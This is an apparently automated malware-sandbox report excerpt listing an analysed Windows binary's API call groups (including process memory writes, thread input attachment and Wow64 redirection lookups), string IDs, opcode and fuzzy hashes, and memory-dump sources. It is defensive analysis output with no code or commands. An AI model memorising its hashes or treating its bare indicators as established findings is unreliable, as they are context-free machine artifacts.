                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: CriticalSection$CloseEnterHandleLeaveLockObjectSingleSyncTerminateThreadWait
                                                            • String ID:
                                                            • API String ID: 3142591903-0
                                                            • Opcode ID: ba6bd7e5b15845e6b6bdca5424b03e7aeaa25a678f545ea5128a0138939c9a9e
                                                            • Instruction ID: ed5095163f39c8c5ac09b3122dba4812ec957afb2cd0ffaeb42af3921a4e66e5
                                                            • Opcode Fuzzy Hash: ba6bd7e5b15845e6b6bdca5424b03e7aeaa25a678f545ea5128a0138939c9a9e
                                                            • Instruction Fuzzy Hash: A10125BAA08A4186E740AF15F44032AB760FB88B91F944036DB8E43B69DF3CD896C751
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Path$ObjectStroke$DeleteFillSelect
                                                            • String ID:
                                                            • API String ID: 2625713937-0
                                                            • Opcode ID: c45599d3bc9fc7debef7ab567c3c0eb4022d53e70f819905b21d88790cde579c
                                                            • Instruction ID: fe944f056a2011ac8bf9472a768a2fd642c94912d2be738d795fb89167c3193f
                                                            • Opcode Fuzzy Hash: c45599d3bc9fc7debef7ab567c3c0eb4022d53e70f819905b21d88790cde579c
                                                            • Instruction Fuzzy Hash: ED015EAD908642D5F7587B12BD84339BB66BF09BA1F984132D42E0A2A4CF7DA444C322
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: ErrorExitLastThread
                                                            • String ID:
                                                            • API String ID: 1611280651-0
                                                            • Opcode ID: 99fd53b48de60ad2b3b37300d72bcddb8f2580f530d7a1e219e10e2618182fab
                                                            • Instruction ID: ccad231082482adff90b086c1be8e705154b0f6ac768d3fd0e57f5f6b6c1a87a
                                                            • Opcode Fuzzy Hash: 99fd53b48de60ad2b3b37300d72bcddb8f2580f530d7a1e219e10e2618182fab
                                                            • Instruction Fuzzy Hash: 74012199B0864292EA05BB24A44437CA662FF40B76FE01736D73E026D5DF3CA854C311
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Thread$CurrentProcessWindow$AttachInputMessageSendTimeout
                                                            • String ID:
                                                            • API String ID: 179993514-0
                                                            • Opcode ID: 3c9aaefa71688af513bcff76e9269722b622f20c654f000aa95846671475ad7f
                                                            • Instruction ID: 242763defbb9d49e5bdbf6c7e8cd3a7a5aeaa0f0a70b11f66fc4e2c4aeec495d
                                                            • Opcode Fuzzy Hash: 3c9aaefa71688af513bcff76e9269722b622f20c654f000aa95846671475ad7f
                                                            • Instruction Fuzzy Hash: F1F039D8F1860282FB143BBA784837897966F8CB43FC45077C81A03256DD3DA499C622
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Thread$CurrentProcessWindow$AttachInputMessageSendTimeout
                                                            • String ID:
                                                            • API String ID: 179993514-0
                                                            • Opcode ID: e2ae8e70be2f5b84d83463abcc11da4b251e2e09d7ca6408d5f9779cbd984f2d
                                                            • Instruction ID: c81ef4ac3c803c82f21af6eb5f4fa219f0df154f6504447b70fa39d183f74a26
                                                            • Opcode Fuzzy Hash: e2ae8e70be2f5b84d83463abcc11da4b251e2e09d7ca6408d5f9779cbd984f2d
                                                            • Instruction Fuzzy Hash: 94F06DDCF1860282FB643BBA784837896567F48783FC45073C90B42299DD7DA49AC662
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: CreateFullInitializeInstanceNamePathUninitialize
                                                            • String ID: .lnk
                                                            • API String ID: 3769357847-24824748
                                                            • Opcode ID: e9a41c1307533edd4d22b0f8b30ca28bda216ecff893dec0b295dcafc10e7183
                                                            • Instruction ID: 983eca5dc2bb755a0d2a0d009857fba5753e56f4573bd3fce63d327c8ebe496d
                                                            • Opcode Fuzzy Hash: e9a41c1307533edd4d22b0f8b30ca28bda216ecff893dec0b295dcafc10e7183
                                                            • Instruction Fuzzy Hash: F5D14BBAB08A56C5EB14EF66E0902AD77B0EB48BC8B888033DE4D47B59DF39D445C351
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                            • API String ID: 3215553584-1196891531
                                                            • Opcode ID: c3c6110ef47f8474b3aee38d103288009a94a732d54534d718fbbb8757739500
                                                            • Instruction ID: a33da9665a8892b24e28db6969270f58d636d91dc2eb72e73cec1fd3994cc709
                                                            • Opcode Fuzzy Hash: c3c6110ef47f8474b3aee38d103288009a94a732d54534d718fbbb8757739500
                                                            • Instruction Fuzzy Hash: 2F818FFAD08202C6FB647F15A550379B6A0AF12784F84803FDA2E576C0DB7DE950D62B
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: _set_statfp
                                                            • String ID: !$acos
                                                            • API String ID: 1156100317-2870037509
                                                            • Opcode ID: 0d89aa78777a41b63d954a76095aee346a1dbdd639e7adc8a9fc006d5894d638
                                                            • Instruction ID: ba96ce6d2e6b71a475c3cc358a96055ab16424a89519c6edf5aac645e00f0083
                                                            • Opcode Fuzzy Hash: 0d89aa78777a41b63d954a76095aee346a1dbdd639e7adc8a9fc006d5894d638
                                                            • Instruction Fuzzy Hash: 9861F965D28F4589E2239F38782037AEB54BFA63C0F508337EA5E35A64DF3CA042C651
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: _set_statfp
                                                            • String ID: !$asin
                                                            • API String ID: 1156100317-2188059690
                                                            • Opcode ID: dda4458e7c1e859fb838f80da50bdd89987d805c8091ebd73b4f99c53429eb29
                                                            • Instruction ID: bfc029cf1d35a52428780a2e049208184e4b1c068e8dcc9cbbf51a2d0a5dc1c5
                                                            • Opcode Fuzzy Hash: dda4458e7c1e859fb838f80da50bdd89987d805c8091ebd73b4f99c53429eb29
                                                            • Instruction Fuzzy Hash: 5C61C9A5C28F8185E213DF38781137ADB54AF963D1F508333EA5E35A69DF3CA042C651
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                            • String ID: @
                                                            • API String ID: 4150878124-2766056989
                                                            • Opcode ID: 8590b3572ee50005f206f958431262ef9082a01c97b701578a5c0a82d3af5d25
                                                            • Instruction ID: fc2de5595dea91ac8a8653554ef2b9d7b9a2e4655e515c58437034c534ef8f95
                                                            • Opcode Fuzzy Hash: 8590b3572ee50005f206f958431262ef9082a01c97b701578a5c0a82d3af5d25
                                                            • Instruction Fuzzy Hash: B451CFBB61868182E720EF56F480AAAF761FBC8B84F810036EE4D57B49DE7CD505CB11
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Menu$Delete$InfoItem
                                                            • String ID: P
                                                            • API String ID: 135850232-3110715001
                                                            • Opcode ID: 7a885196f2dcceb0a8221e88f5e4acf8149e86b4233e81131ef081c483961346
                                                            • Instruction ID: c639dc18f2ef62d378aa8764fec4873a9419da39a76ec26978be99047d9cbdc2
                                                            • Opcode Fuzzy Hash: 7a885196f2dcceb0a8221e88f5e4acf8149e86b4233e81131ef081c483961346
                                                            • Instruction Fuzzy Hash: E74117B6A04A8181E710EB19E4043ADA762FB84B60F968272DA6D037C1DF3DE456C722
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: ByteCharErrorFileLastMultiWideWrite
                                                            • String ID: U
                                                            • API String ID: 2456169464-4171548499
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: MessageSend$Window$CreateObjectStock
                                                            • String ID: SysMonthCal32
                                                            • API String ID: 2671490118-1439706946
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: MessageSend$Window$CreateMoveObjectStock
                                                            • String ID: Listbox
                                                            • API String ID: 3747482310-2633736733
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: ErrorMode$InformationVolume
                                                            • String ID: %lu
                                                            • API String ID: 2507767853-685833217
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: MessageSend$CreateObjectStockWindow
                                                            • String ID: msctls_trackbar32
                                                            • API String ID: 1025951953-1010561917
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: Thread$CurrentProcessWindow$AttachChildClassEnumFocusInputMessageNameParentSendTimeoutWindows
                                                            • String ID: %s%d
                                                            • API String ID: 2330185562-1110647743
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: Exception$DestructObject$Raise__vcrt_getptd_noexit
                                                            • String ID: csm
                                                            • API String ID: 2280078643-1018135373
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: CloseControlCreateDeviceFileHandle
                                                            • String ID: 0
                                                            • API String ID: 33631002-4108050209
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7EC182DD1), ref: 00007FF7EC1BAF37
                                                            • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7EC182DD1), ref: 00007FF7EC1BAF4F
                                                            Strings
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                            • API String ID: 2574300362-1816364905
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                            • API String ID: 2574300362-3689287502
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: RegDeleteKeyExW$advapi32.dll
                                                            • API String ID: 2574300362-4033151799
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: GetModuleHandleExW$kernel32.dll
                                                            • API String ID: 2574300362-199464113
                                                            APIs
                                                            Similarity
                                                            • API ID: ClearVariant
                                                            • String ID:
                                                            • API String ID: 1473721057-0
                                                            APIs
                                                            Similarity
                                                            • API ID: CreateDirectory$AttributesErrorFileLast
                                                            • String ID:
                                                            • API String ID: 2267087916-0
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$socket
                                                            • String ID:
                                                            • API String ID: 1881357543-0
                                                            APIs
                                                            Similarity
                                                            • API ID: CreateHardLink$DeleteErrorFileLast
                                                            • String ID:
                                                            • API String ID: 3321077145-0
                                                            APIs
                                                            Similarity
                                                            • API ID: Rect$BeepClientMessageScreenWindow
                                                            • String ID:
                                                            • API String ID: 1352109105-0
                                                            APIs
                                                            Similarity
                                                            • API ID: Menu$Item$DrawInfoInsert
                                                            • String ID:
                                                            • API String ID: 3076010158-0
                                                            APIs
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                                                            • String ID:
                                                            • API String ID: 4141327611-0
                                                            APIs
                                                            Similarity
                                                            • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                                            • String ID:
                                                            • API String ID: 1083639309-0
                                                            APIs
                                                            Similarity
                                                            • API ID: KeyboardState$InputMessagePostSend
                                                            • String ID:
                                                            • API String ID: 432972143-0
                                                            APIs
                                                            Similarity
                                                            • API ID: LongWindow$InvalidateMessageRectSend
                                                            • String ID:
                                                            • API String ID: 3340791633-0
                                                            APIs
                                                            Similarity
                                                            • API ID: KeyboardState$InputMessagePostSend
                                                            • String ID:
                                                            • API String ID: 432972143-0
                                                            APIs
                                                            • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF7EC15A27B,?,?,?,00007FF7EC15A236), ref: 00007FF7EC163DB1
                                                            • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF7EC15A27B,?,?,?,00007FF7EC15A236), ref: 00007FF7EC163E13
                                                            • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF7EC15A27B,?,?,?,00007FF7EC15A236), ref: 00007FF7EC163E4D
                                                            • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF7EC15A27B,?,?,?,00007FF7EC15A236), ref: 00007FF7EC163E77
                                                            Similarity
                                                            • API ID: ByteCharEnvironmentMultiStringsWide$Free
                                                            • String ID:
                                                            • API String ID: 1557788787-0
                                                            APIs
                                                            Similarity
                                                            • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                            • String ID:
                                                            • API String ID: 2864067406-0
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: lstrcmpilstrcpylstrlen
                                                            • String ID: cdecl
                                                            • API String ID: 4031866154-3896280584
                                                            APIs
                                                            Similarity
                                                            • API ID: Heap$InformationProcessToken$AllocCopyErrorFreeLastLength
                                                            • String ID:
                                                            • API String ID: 837644225-0
                                                            APIs
                                                              • Part of subcall function 00007FF7EC122A54: GetWindowLongPtrW.USER32 ref: 00007FF7EC122A71
                                                            • GetClientRect.USER32(?,?,?,?,?,00007FF7EC16AA36,?,?,?,?,?,?,?,?,?,00007FF7EC1227AF), ref: 00007FF7EC1D22C4
                                                            • GetCursorPos.USER32(?,?,?,?,?,00007FF7EC16AA36,?,?,?,?,?,?,?,?,?,00007FF7EC1227AF), ref: 00007FF7EC1D22CF
                                                            • ScreenToClient.USER32 ref: 00007FF7EC1D22DD
                                                            • DefDlgProcW.USER32(?,?,?,?,?,00007FF7EC16AA36,?,?,?,?,?,?,?,?,?,00007FF7EC1227AF), ref: 00007FF7EC1D231F
                                                              • Part of subcall function 00007FF7EC1CE894: LoadCursorW.USER32 ref: 00007FF7EC1CE945
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: ClientCursor$LoadLongProcRectScreenWindow
                                                            • String ID:
                                                            • API String ID: 1626762757-0
                                                            • Opcode ID: c10d22a9dfdb007e9cd3e446db2f26fc59a904d9b079c484f8598dfd72a81c9f
                                                            • Instruction ID: 6b6ae01e0da3a8f5fd673af154a19a5827913ee3a76757fb396ee3302b92431a
                                                            • Opcode Fuzzy Hash: c10d22a9dfdb007e9cd3e446db2f26fc59a904d9b079c484f8598dfd72a81c9f
                                                            • Instruction Fuzzy Hash: 52216079A0865286EA14EF05F480269B760FB88F81F954132EB5D47B59CF3CE940CB22
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: CloseCurrentHandleMessageObjectSingleThreadWait_invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 2979156933-0
                                                            • Opcode ID: 2a49c66315dd4afd268b707153c3627d2a79b8a5ce35e179a418e828e304454b
                                                            • Instruction ID: 6fafccb4e8fb47be249ce2edd68795492f84f7deb0ea71a7e551fd58117939e9
                                                            • Opcode Fuzzy Hash: 2a49c66315dd4afd268b707153c3627d2a79b8a5ce35e179a418e828e304454b
                                                            • Instruction Fuzzy Hash: CC21F676A0878286E310EF26B880366FA91BB84BD4F844136E99D43B59CF7CE405C752
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: _ctrlfp
                                                            • String ID:
                                                            • API String ID: 697997973-0
                                                            • Opcode ID: 696024c0d85e9950b44dad3db47e8c6049c7f355de1dae667ed974782f5b2eb5
                                                            • Instruction ID: ddca049bdca5c88b4791e98c7b7a40e97aea351ff7477b078de4cf7ae73d9903
                                                            • Opcode Fuzzy Hash: 696024c0d85e9950b44dad3db47e8c6049c7f355de1dae667ed974782f5b2eb5
                                                            • Instruction Fuzzy Hash: EF11C969D0CA8582E611EA3CB04127BD371EF9A7C0FE44232FB894B795DE3DE440CA11
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: ClientRectScreen$InvalidateWindow
                                                            • String ID:
                                                            • API String ID: 357397906-0
                                                            • Opcode ID: 30ca773a2ae41b56c6e1d6d31e0bfc9c1d6a93403dc69e79101ac1cf7de44ee4
                                                            • Instruction ID: c346d90ed2b1958b0a2461c0a3177c8318d41cf176f4d929ea1f2b31bf955844
                                                            • Opcode Fuzzy Hash: 30ca773a2ae41b56c6e1d6d31e0bfc9c1d6a93403dc69e79101ac1cf7de44ee4
                                                            • Instruction Fuzzy Hash: D421D8BAA04B41DFEB00DF78E84469C7BB0F748B88B444826EA5893B18DB78D654CB51
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmp
